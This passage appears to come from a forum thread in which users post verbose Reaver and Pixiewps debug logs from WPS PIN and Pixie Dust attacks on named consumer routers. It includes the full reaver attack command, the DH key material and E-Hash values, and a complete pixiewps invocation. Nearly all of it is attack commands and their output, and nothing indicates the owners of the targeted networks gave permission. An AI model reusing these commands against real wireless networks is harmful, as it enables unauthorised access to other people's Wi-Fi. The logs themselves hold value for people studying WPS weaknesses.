    WPS: EMSK - hexdump(len=32): 1d 08 31 9d 3a 8e e4 65 27 ea 36 34 08 11 09 9b dd 7f 8b 27 b4 58 4c 62 3c bc 24 5e 76 84 ee 10
    WPS: * Authentication Type Flags
    WPS: * Encryption Type Flags
    WPS: * Connection Type Flags
    WPS: * Config Methods (8c)
    WPS: * Manufacturer
    WPS: * Model Name
    WPS: * Model Number
    WPS: * Serial Number
    WPS: * Primary Device Type
    WPS: * Device Name
    WPS: * RF Bands (0)
    WPS: * Association State
    WPS: * Configuration Error (0)
    WPS: * Device Password ID (0)
    WPS: * OS Version
    WPS: * Authenticator
    [+] Sending M2 message
    send_packet called from send_msg() send.c:116
    WPS: Processing received message (len=539 op_code=4)
    WPS: Received WSC_MSG
    WPS: Parsed WSC_MSG
    WPS: Received M1
    WPS: Unexpected state (15) for receiving M1
    WPS: returning
    [+] Received M1 message
    WPS: Building Message WSC_NACK
    WPS: * Version
    WPS: * Message Type (14)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * Configuration Error (0)
    [+] Sending WSC NACK
    send_packet called from send_msg() send.c:116
    WPS: Building Message WSC_NACK
    WPS: * Version
    WPS: * Message Type (14)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * Configuration Error (0)
    [+] Sending WSC NACK
    send_packet called from send_msg() send.c:116
    send_packet called from send_termination() send.c:142
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    WPS: Invalidating used wildcard PIN
    WPS: Invalidated PIN for UUID - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 f4 3e 61 89 44 eb
    WPS: A new PIN configured (timeout=0)
    WPS: UUID - hexdump(len=16): [NULL]
    WPS: PIN - hexdump_ascii(len=8):
    31 32 33 34 35 36 37 30 12345670
    WPS: Selected registrar information changed
    WPS: Internal Registrar selected (pbc=0)
    WPS: sel_reg_union
    WPS: set_ie
    WPS: cb_set_sel_reg
    WPS: Enter wps_cg_set_sel_reg
    WPS: Leave wps_cg_set_sel_reg early
    WPS: return from wps_selected_registrar_changed
    [+] Trying pin "12345670"
    send_packet called from deauthenticate() 80211.c:326
    send_packet called from authenticate() 80211.c:357
    [+] Sending authentication request
    send_packet called from associate() 80211.c:410
    [+] Sending association request
    [+] Associated with F4:3E:61:89:44:EB (ESSID: Digicom)
    [+] Sending EAPOL START request
    send_packet called from send_eapol_start() send.c:48
    send_packet called from resend_last_packet() send.c:161
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    WPS: Processing received message (len=539 op_code=4)
    WPS: Received WSC_MSG
    WPS: Parsed WSC_MSG
    WPS: Received M1
    WPS: UUID-E - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 f4 3e 61 89 44 eb
    WPS: Enrollee MAC Address f4:3e:61:89:44:eb
    WPS: Enrollee Nonce - hexdump(len=16): 00 00 67 ea 00 00 7a 02 00 00 00 48 00 00 7d 4c
    WPS: Enrollee Authentication Type flags 0x27
    WPS: No match in supported authentication types (own 0x0 Enrollee 0x27)
    WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
    WPS: Enrollee Encryption Type flags 0xf
    WPS: No match in supported encryption types (own 0x0 Enrollee 0xf)
    WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
    WPS: Enrollee Connection Type flags 0x1
    WPS: Enrollee Config Methods 0x86 [Ethernet] [Label] [PBC]
    WPS: Prefer PSK format key due to Enrollee not supporting display
    WPS: Enrollee Wi-Fi Protected Setup State 2
    WPS: Manufacturer - hexdump_ascii(len=64):
    52 65 61 6c 74 65 6b 20 53 65 6d 69 63 6f 6e 64 Realtek Semicond
    75 63 74 6f 72 20 43 6f 72 70 2e 00 00 00 00 00 uctor Corp._____
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ________________
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ________________
    WPS: Model Name - hexdump_ascii(len=32):
    52 54 4c 38 36 37 31 00 00 00 00 00 00 00 00 00 RTL8671_________
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ________________
    WPS: Model Number - hexdump_ascii(len=32):
    45 56 2d 32 30 30 36 2d 30 37 2d 32 37 00 00 00 EV-2006-07-27___
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ________________
    WPS: Serial Number - hexdump_ascii(len=32):
    31 32 33 34 35 36 37 38 39 30 31 32 33 34 37 00 123456789012347_
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ________________
    WPS: Primary Device Type: 6-0050F204-1
    WPS: Device Name - hexdump_ascii(len=32):
    41 44 53 4c 20 52 6f 75 74 65 72 2f 4d 6f 64 65 ADSL Router/Mode
    6d 20 49 47 44 00 00 00 00 00 00 00 00 00 00 00 m IGD___________
    WPS: Enrollee RF Bands 0x1
    WPS: Enrollee Association State 0
    WPS: Device Password ID 0
    WPS: Enrollee Configuration Error 0
    WPS: OS Version 10000000
    WPS: M1 Processed
    WPS: dev_pw_id checked
    WPS: PBC Checked
    WPS: Entering State SEND_M2
    WPS: WPS_CONTINUE, Freeing Last Message
    WPS: WPS_CONTINUE, Saving Last Message
    WPS: returning
    [+] Received M1 message
    WPS: Found a wildcard PIN. Assigned it for this UUID-E
    WPS: Registrar Nonce - hexdump(len=16): 32 6c 4d 79 ae 28 86 75 53 bf 55 88 33 b8 26 13
    WPS: UUID-R - hexdump(len=16): 90 06 79 56 8f 82 ec 68 25 d3 51 fa e1 de 35 c9
    WPS: Building Message M2
    WPS: * Version
    WPS: * Message Type (5)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * UUID-R
    WPS: * Public Key
    WPS: Generate new DH keys
    DH: private value - hexdump(len=192): dd 67 2f 65 74 c8 2c 59 7f 05 4d 21 0b 0f 0f 85 a9 7d 62 47 e3 bf 8a 17 08 1b d4 fc 99 72 e4 f8 51 30 33 fe 80 3f 4f f7 de 2d 77 e6 a9 e5 69 f3 b0 8e d1 f7 ea ef 32 07 2e 30 2b 89 c1 e4 e7 bc 30 30 ff 55 ea 6c d3 37 07 70 0f e7 7b 0a 06 81 4c 70 e4 8c 76 27 fd 8a f3 20 4a 23 89 60 39 98 f3 44 53 d3 dd 3c e9 8f d8 07 fc bb db 69 68 57 43 e1 1b 10 0e ad 6a 83 5b 3b 4e 78 39 7d 5b 7c 0f 7b bc ae 51 4b e3 b6 07 da c8 30 48 78 9b c5 28 77 e1 47 65 0f d7 e2 5c 5d e6 64 f2 5b ae d0 9d 4a fb 2e e1 c8 56 36 a9 d1 0d ec 46 bc f4 dc 2a 88 c0 6a dd 97 19 d0 36 b2 ab eb 24 15 03 00
    DH: public value - hexdump(len=192): 83 6e d9 54 ab 54 0d 86 b9 bb 19 e8 1c 93 9f 4b 45 4d 1c 73 f9 ee 1b 60 d0 19 66 c2 7f f8 8d 8e e0 d9 a8 b2 70 9a 63 3b e6 0f 19 4a f7 b4 ed ff 68 19 bf 21 f2 79 28 1f e1 b6 7b be ce 96 ae 5d 48 50 40 0b 6a 62 d7 c3 80 93 ea 1d 87 29 93 30 eb 1e a8 22 88 6b 07 8c d4 26 d7 5d 9e 4b bb 45 46 9b 64 82 1a 2b 48 56 83 70 2e 3c fd ff c0 b8 51 af f7 70 85 72 a4 12 80 2e d9 86 57 ae f6 ba d8 27 82 9a 30 41 af 74 2e b5 16 aa 81 9f a2 3d 3a 16 41 40 a6 4c 75 ee 3c 07 8e 91 dd 95 5e db 70 8d 32 cc 15 97 43 9b 79 04 33 9f 32 fb 58 7e 50 d5 03 69 75 30 11 a1 9f d1 94 d5 bf dd a9 36
    WPS: DH Private Key - hexdump(len=192): dd 67 2f 65 74 c8 2c 59 7f 05 4d 21 0b 0f 0f 85 a9 7d 62 47 e3 bf 8a 17 08 1b d4 fc 99 72 e4 f8 51 30 33 fe 80 3f 4f f7 de 2d 77 e6 a9 e5 69 f3 b0 8e d1 f7 ea ef 32 07 2e 30 2b 89 c1 e4 e7 bc 30 30 ff 55 ea 6c d3 37 07 70 0f e7 7b 0a 06 81 4c 70 e4 8c 76 27 fd 8a f3 20 4a 23 89 60 39 98 f3 44 53 d3 dd 3c e9 8f d8 07 fc bb db 69 68 57 43 e1 1b 10 0e ad 6a 83 5b 3b 4e 78 39 7d 5b 7c 0f 7b bc ae 51 4b e3 b6 07 da c8 30 48 78 9b c5 28 77 e1 47 65 0f d7 e2 5c 5d e6 64 f2 5b ae d0 9d 4a fb 2e e1 c8 56 36 a9 d1 0d ec 46 bc f4 dc 2a 88 c0 6a dd 97 19 d0 36 b2 ab eb 24 15 03 00
    WPS: DH own Public Key - hexdump(len=192): 83 6e d9 54 ab 54 0d 86 b9 bb 19 e8 1c 93 9f 4b 45 4d 1c 73 f9 ee 1b 60 d0 19 66 c2 7f f8 8d 8e e0 d9 a8 b2 70 9a 63 3b e6 0f 19 4a f7 b4 ed ff 68 19 bf 21 f2 79 28 1f e1 b6 7b be ce 96 ae 5d 48 50 40 0b 6a 62 d7 c3 80 93 ea 1d 87 29 93 30 eb 1e a8 22 88 6b 07 8c d4 26 d7 5d 9e 4b bb 45 46 9b 64 82 1a 2b 48 56 83 70 2e 3c fd ff c0 b8 51 af f7 70 85 72 a4 12 80 2e d9 86 57 ae f6 ba d8 27 82 9a 30 41 af 74 2e b5 16 aa 81 9f a2 3d 3a 16 41 40 a6 4c 75 ee 3c 07 8e 91 dd 95 5e db 70 8d 32 cc 15 97 43 9b 79 04 33 9f 32 fb 58 7e 50 d5 03 69 75 30 11 a1 9f d1 94 d5 bf dd a9 36
    WPS: DH Private Key - hexdump(len=192): dd 67 2f 65 74 c8 2c 59 7f 05 4d 21 0b 0f 0f 85 a9 7d 62 47 e3 bf 8a 17 08 1b d4 fc 99 72 e4 f8 51 30 33 fe 80 3f 4f f7 de 2d 77 e6 a9 e5 69 f3 b0 8e d1 f7 ea ef 32 07 2e 30 2b 89 c1 e4 e7 bc 30 30 ff 55 ea 6c d3 37 07 70 0f e7 7b 0a 06 81 4c 70 e4 8c 76 27 fd 8a f3 20 4a 23 89 60 39 98 f3 44 53 d3 dd 3c e9 8f d8 07 fc bb db 69 68 57 43 e1 1b 10 0e ad 6a 83 5b 3b 4e 78 39 7d 5b 7c 0f 7b bc ae 51 4b e3 b6 07 da c8 30 48 78 9b c5 28 77 e1 47 65 0f d7 e2 5c 5d e6 64 f2 5b ae d0 9d 4a fb 2e e1 c8 56 36 a9 d1 0d ec 46 bc f4 dc 2a 88 c0 6a dd 97 19 d0 36 b2 ab eb 24 15 03 00
    WPS: DH peer Public Key - hexdump(len=192): d0 14 1b 15 65 6e 96 b8 5f ce ad 2e 8e 76 33 0d 2b 1a c1 57 6b b0 26 e7 a3 28 c0 e1 ba f8 cf 91 66 43 71 17 4c 08 ee 12 ec 92 b0 51 9c 54 87 9f 21 25 5b e5 a8 77 0e 1f a1 88 04 70 ef 42 3c 90 e3 4d 78 47 a6 fc b4 92 45 63 d1 af 1d b0 c4 81 ea d9 85 2c 51 9b f1 dd 42 9c 16 39 51 cf 69 18 1b 13 2a ea 2a 36 84 ca f3 5b c5 4a ca 1b 20 c8 8b b3 b7 33 9f f7 d5 6e 09 13 9d 77 f0 ac 58 07 90 97 93 82 51 db be 75 e8 67 15 cc 6b 7c 0c a9 45 fa 8d d8 d6 61 be b7 3b 41 40 32 79 8d ad ee 32 b5 dd 61 bf 10 5f 18 d8 92 17 76 0b 75 c5 d9 66 a5 a4 90 47 2c eb a9 e3 b4 22 4f 3d 89 fb 2b
    DH: shared key - hexdump(len=192): f5 e3 e2 89 f2 78 fb 35 f6 c7 88 f4 73 97 8c c2 0f d7 af 90 08 90 78 fe 24 69 f2 c8 29 f1 13 a8 c4 f1 c3 a2 46 f1 40 bb c0 95 ac f1 80 95 06 5d 0f 98 75 5f 2e 81 4f 7a 07 43 6e 80 e2 d1 ff 9e 3d ce 96 dd bd 26 c3 e7 de 66 06 9d 78 22 56 11 d9 d6 e1 81 aa 45 fb 84 57 ea cb 84 c0 83 e4 60 48 51 0d 3e 63 fd ac 19 92 60 89 b5 25 71 e6 7c 75 c6 10 95 c2 75 37 75 15 69 cc 2f 80 8b 39 28 a0 e2 c8 4d 59 63 6b cc c6 91 84 85 03 30 6c 69 c6 be 5b 1c d1 ad bc 88 74 22 f6 f0 cd 7f af ee 39 9d ba 6a ce a1 c9 e2 7b 44 db bb 62 97 49 bb f0 e0 9c 4e 29 21 79 95 3a 2e bd 3f 56 61 22 ce
    WPS: DH shared key - hexdump(len=192): f5 e3 e2 89 f2 78 fb 35 f6 c7 88 f4 73 97 8c c2 0f d7 af 90 08 90 78 fe 24 69 f2 c8 29 f1 13 a8 c4 f1 c3 a2 46 f1 40 bb c0 95 ac f1 80 95 06 5d 0f 98 75 5f 2e 81 4f 7a 07 43 6e 80 e2 d1 ff 9e 3d ce 96 dd bd 26 c3 e7 de 66 06 9d 78 22 56 11 d9 d6 e1 81 aa 45 fb 84 57 ea cb 84 c0 83 e4 60 48 51 0d 3e 63 fd ac 19 92 60 89 b5 25 71 e6 7c 75 c6 10 95 c2 75 37 75 15 69 cc 2f 80 8b 39 28 a0 e2 c8 4d 59 63 6b cc c6 91 84 85 03 30 6c 69 c6 be 5b 1c d1 ad bc 88 74 22 f6 f0 cd 7f af ee 39 9d ba 6a ce a1 c9 e2 7b 44 db bb 62 97 49 bb f0 e0 9c 4e 29 21 79 95 3a 2e bd 3f 56 61 22 ce
    WPS: DHKey - hexdump(len=32): 88 de a6 36 aa 7d d4 04 73 d6 19 53 01 e2 e9 2c 01 bb 13 d1 ce f8 20 59 a9 4b c9 07 98 48 6a 3c
    WPS: KDK - hexdump(len=32): c7 b2 99 57 a2 87 a5 90 42 c4 bc 57 15 76 1e a8 38 5f b9 ce bd 27 24 3e 20 f2 3e e3 7f 27 74 7e
    WPS: AuthKey - hexdump(len=32): 72 46 94 e8 db 8d 34 45 9b da e1 f9 5c d0 b5 b2 c9 4e 6f b6 13 36 84 7a d0 cb 30 2e 90 01 a7 4e
    WPS: KeyWrapKey - hexdump(len=16): 5b d8 db e2 d7 b7 12 76 a2 54 a0 69 28 e7 21 d9
    WPS: EMSK - hexdump(len=32): 20 4a 35 30 fd 2b e0 be 34 3f 05 02 dc e5 2b b1 53 b7 61 a5 4a 21 6e 33 9f ad e6 8a 57 4f d6 01
    WPS: * Authentication Type Flags
    WPS: * Encryption Type Flags
    WPS: * Connection Type Flags
    WPS: * Config Methods (8c)
    WPS: * Manufacturer
    WPS: * Model Name
    WPS: * Model Number
    WPS: * Serial Number
    WPS: * Primary Device Type
    WPS: * Device Name
    WPS: * RF Bands (0)
    WPS: * Association State
    WPS: * Configuration Error (0)
    WPS: * Device Password ID (0)
    WPS: * OS Version
    WPS: * Authenticator
    [+] Sending M2 message
    send_packet called from send_msg() send.c:116
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    WPS: Processing received message (len=114 op_code=4)
    WPS: Received WSC_MSG
    WPS: Parsed WSC_MSG
    WPS: Received M3
    WPS: E-Hash1 - hexdump(len=32): 04 5f dc 02 7a c3 6e e2 14 cc 75 83 80 47 42 37 4b 1c 3e 71 3d 0b 02 a0 45 7a c9 f2 df 9f ab 7f
    WPS: E-Hash2 - hexdump(len=32): 36 73 2b a6 69 7e 0f f8 8b 31 94 e7 28 c5 30 22 46 44 f6 58 d2 24 7e 14 12 af 7c b4 91 06 69 f3
    executing pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a3 28c0e1baf8cf91664371174c08ee12ec92b0519c54879f2125 5be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1 af1db0c481ead9852c519bf1dd429c163951cf69181b132aea 2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0 ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661 beb73b414032798dadee32b5dd61bf105f18d89217760b75c5 d966a5a490472ceba9e3b4224f3d89fb2b -s 045fdc027ac36ee214cc7583804742374b1c3e713d0b02a045 7ac9f2df9fab7f -z 36732ba6697e0ff88b3194e728c530224644f658d2247e1412 af7cb4910669f3 -a 724694e8db8d34459bdae1f95cd0b5b2c94e6fb61336847ad0 cb302e9001a74e -n 000067ea00007a020000004800007d4c -r 836ed954ab540d86b9bb19e81c939f4b454d1c73f9ee1b60d0 1966c27ff88d8ee0d9a8b2709a633be60f194af7b4edff6819 bf21f279281fe1b67bbece96ae5d4850400b6a62d7c38093ea 1d87299330eb1ea822886b078cd426d75d9e4bbb45469b6482 1a2b485683702e3cfdffc0b851aff7708572a412802ed98657 aef6bad827829a3041af742eb516aa819fa23d3a164140a64c 75ee3c078e91dd955edb708d32cc1597439b7904339f32fb58 7e50d50369753011a19fd194d5bfdda936

    Pixiewps 1.4

    [-] WPS pin not found!

    [*] Time taken: 0 s 90 ms

    [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.

    [@] Looks like you have some interesting data! Please consider contributing with your data to improve pixiewps. Follow the instructions on http://0x0.st/tm - Thank you!

  12. #12
    Join Date
    2018-Apr
    Posts
    2
    reaver -i wlan0mon -b A8:32:9A:00:77:FE -c 1 -vvv -K 1

    Reaver v1.6.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

    [+] Switching wlan0mon to channel 1
    [+] Waiting for beacon from A8:32:9A:00:77:FE
    [+] Received beacon from A8:32:9A:00:77:FE
    [+] Vendor: RealtekS
    WPS: A new PIN configured (timeout=0)
    WPS: UUID - hexdump(len=16): [NULL]
    WPS: PIN - hexdump_ascii(len=8):
    31 32 33 34 35 36 37 30 12345670
    WPS: Selected registrar information changed
    WPS: Internal Registrar selected (pbc=0)
    WPS: sel_reg_union
    WPS: set_ie
    WPS: cb_set_sel_reg
    WPS: Enter wps_cg_set_sel_reg
    WPS: Leave wps_cg_set_sel_reg early
    WPS: return from wps_selected_registrar_changed
    [+] Trying pin "12345670"
    send_packet called from deauthenticate() 80211.c:326
    send_packet called from authenticate() 80211.c:357
    [+] Sending authentication request
    send_packet called from associate() 80211.c:410
    [+] Sending association request
    [+] Associated with A8:32:9A:00:77:FE (ESSID: Bimalawifi)
    [+] Sending EAPOL START request
    send_packet called from send_eapol_start() send.c:48
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    WPS: Processing received message (len=422 op_code=4)
    WPS: Received WSC_MSG
    WPS: Unsupported attribute type 0x1049 len=6
    WPS: Parsed WSC_MSG
    WPS: Received M1
    WPS: UUID-E - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 a8 32 9a 00 77 fe
    WPS: Enrollee MAC Address a8:32:9a:00:77:fe
    WPS: Enrollee Nonce - hexdump(len=16): 01 2a bb 94 1c 80 f2 25 55 99 69 c1 4a ee 29 ce
    WPS: Enrollee Authentication Type flags 0x27
    WPS: No match in supported authentication types (own 0x0 Enrollee 0x27)
    WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
    WPS: Enrollee Encryption Type flags 0xf
    WPS: No match in supported encryption types (own 0x0 Enrollee 0xf)
    WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
    WPS: Enrollee Connection Type flags 0x1
    WPS: Enrollee Config Methods 0x86 [Ethernet] [Label] [PBC]
    WPS: Prefer PSK format key due to Enrollee not supporting display
    WPS: Enrollee Wi-Fi Protected Setup State 2
    WPS: Manufacturer - hexdump_ascii(len=15):
    57 69 72 65 6c 65 73 73 20 52 6f 75 74 65 72 Wireless Router
    WPS: Model Name - hexdump_ascii(len=7):
    52 54 4c 38 36 37 31 RTL8671
    WPS: Model Number - hexdump_ascii(len=13):
    45 56 2d 32 30 30 36 2d 30 37 2d 32 37 EV-2006-07-27
    WPS: Serial Number - hexdump_ascii(len=15):
    31 32 33 34 35 36 37 38 39 30 31 32 33 34 37 123456789012347
    WPS: Primary Device Type: 6-0050F204-1
    WPS: Device Name - hexdump_ascii(len=15):
    57 69 72 65 6c 65 73 73 20 52 6f 75 74 65 72 Wireless Router
    WPS: Enrollee RF Bands 0x1
    WPS: Enrollee Association State 0
    WPS: Device Password ID 0
    WPS: Enrollee Configuration Error 0
    WPS: OS Version 10000000
    WPS: M1 Processed
    WPS: dev_pw_id checked
    WPS: PBC Checked
    WPS: Entering State SEND_M2
    WPS: WPS_CONTINUE, Freeing Last Message
    WPS: WPS_CONTINUE, Saving Last Message
    WPS: returning
    [+] Received M1 message
    WPS: Found a wildcard PIN. Assigned it for this UUID-E
    WPS: Registrar Nonce - hexdump(len=16): 12 d5 d7 40 9b f0 e2 2f f6 c5 ed 49 89 f7 aa 76
    WPS: UUID-R - hexdump(len=16): a5 2f e6 d2 6c 6c f9 1e d0 4c a3 77 37 0f 55 91
    WPS: Building Message M2
    WPS: * Version
    WPS: * Message Type (5)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * UUID-R
    WPS: * Public Key
    WPS: Generate new DH keys
    DH: private value - hexdump(len=192): c1 9d 45 a6 d6 24 53 dd 20 53 c9 cc 6e 1a 24 aa 1e 3b 2c 04 d6 e7 4e d3 98 5a be 80 e5 6d 84 b0 f8 72 2d e4 25 e6 22 a0 48 24 9b 24 76 af 6a c2 90 ef a4 81 ae a7 77 21 75 78 1b 56 d1 64 86 8c 1d 5e 62 df 60 44 dc b4 15 ba 8f 00 5a 7f 38 78 5d 64 ef 05 5b 04 43 78 7c 1e 6d 02 d6 4a 6c f8 cc 6b db 84 98 1c 45 9d ef 03 d4 c5 13 bf e3 e5 34 33 07 4c 7c d6 f6 ef f6 ce c7 bf 5c 89 cf 12 33 f8 7f f4 90 7f 06 4c 88 a8 19 a6 1c 29 f9 35 f4 cf d1 23 e9 9d c8 79 9b f3 41 79 03 f6 bb a0 22 53 e4 11 aa 0b 9e a4 a7 00 2d 86 bc b2 51 e3 70 64 9b af d2 bd dd 4a a6 f0 a9 d5 3c cb 4e 97
    DH: public value - hexdump(len=192): 9d c1 7d cc 93 da 16 0b ca 2c 87 1a fa be 14 ba 4f 66 8d b1 be 1e 10 8b 14 43 dc a1 82 2e 62 fb 51 41 1a a6 e2 aa 29 76 4f 44 81 8b b5 aa 2e cf 43 f6 6a da 3b 66 9e 58 9c 82 57 38 dd 3f 48 f8 b8 ee 84 78 48 04 ec a9 60 0b c8 7d 16 2e d5 1b 4d cc 3b 8f a1 e0 2f c6 e4 ab c1 89 80 7a 4c 5a 22 cd c7 7b bc 20 a5 46 b2 86 d8 50 12 fc ae 8e cc 02 15 94 55 a0 fd 5f 94 6e 8b 97 18 20 4c b7 f1 4a 34 6c 7e a5 ce a7 c2 a0 b6 b0 ab b6 4c 56 ce 7c 5d cc 8f 0c 64 07 0e 1c 99 8d 5e dd 88 62 b8 38 b7 0d 1d 36 fb 0f 07 f1 ec 5f 34 df c4 c8 96 e4 67 c9 a0 5e 12 a8 f7 6c 15 1c b0 82 3a 08
    WPS: DH Private Key - hexdump(len=192): c1 9d 45 a6 d6 24 53 dd 20 53 c9 cc 6e 1a 24 aa 1e 3b 2c 04 d6 e7 4e d3 98 5a be 80 e5 6d 84 b0 f8 72 2d e4 25 e6 22 a0 48 24 9b 24 76 af 6a c2 90 ef a4 81 ae a7 77 21 75 78 1b 56 d1 64 86 8c 1d 5e 62 df 60 44 dc b4 15 ba 8f 00 5a 7f 38 78 5d 64 ef 05 5b 04 43 78 7c 1e 6d 02 d6 4a 6c f8 cc 6b db 84 98 1c 45 9d ef 03 d4 c5 13 bf e3 e5 34 33 07 4c 7c d6 f6 ef f6 ce c7 bf 5c 89 cf 12 33 f8 7f f4 90 7f 06 4c 88 a8 19 a6 1c 29 f9 35 f4 cf d1 23 e9 9d c8 79 9b f3 41 79 03 f6 bb a0 22 53 e4 11 aa 0b 9e a4 a7 00 2d 86 bc b2 51 e3 70 64 9b af d2 bd dd 4a a6 f0 a9 d5 3c cb 4e 97
    WPS: DH own Public Key - hexdump(len=192): 9d c1 7d cc 93 da 16 0b ca 2c 87 1a fa be 14 ba 4f 66 8d b1 be 1e 10 8b 14 43 dc a1 82 2e 62 fb 51 41 1a a6 e2 aa 29 76 4f 44 81 8b b5 aa 2e cf 43 f6 6a da 3b 66 9e 58 9c 82 57 38 dd 3f 48 f8 b8 ee 84 78 48 04 ec a9 60 0b c8 7d 16 2e d5 1b 4d cc 3b 8f a1 e0 2f c6 e4 ab c1 89 80 7a 4c 5a 22 cd c7 7b bc 20 a5 46 b2 86 d8 50 12 fc ae 8e cc 02 15 94 55 a0 fd 5f 94 6e 8b 97 18 20 4c b7 f1 4a 34 6c 7e a5 ce a7 c2 a0 b6 b0 ab b6 4c 56 ce 7c 5d cc 8f 0c 64 07 0e 1c 99 8d 5e dd 88 62 b8 38 b7 0d 1d 36 fb 0f 07 f1 ec 5f 34 df c4 c8 96 e4 67 c9 a0 5e 12 a8 f7 6c 15 1c b0 82 3a 08
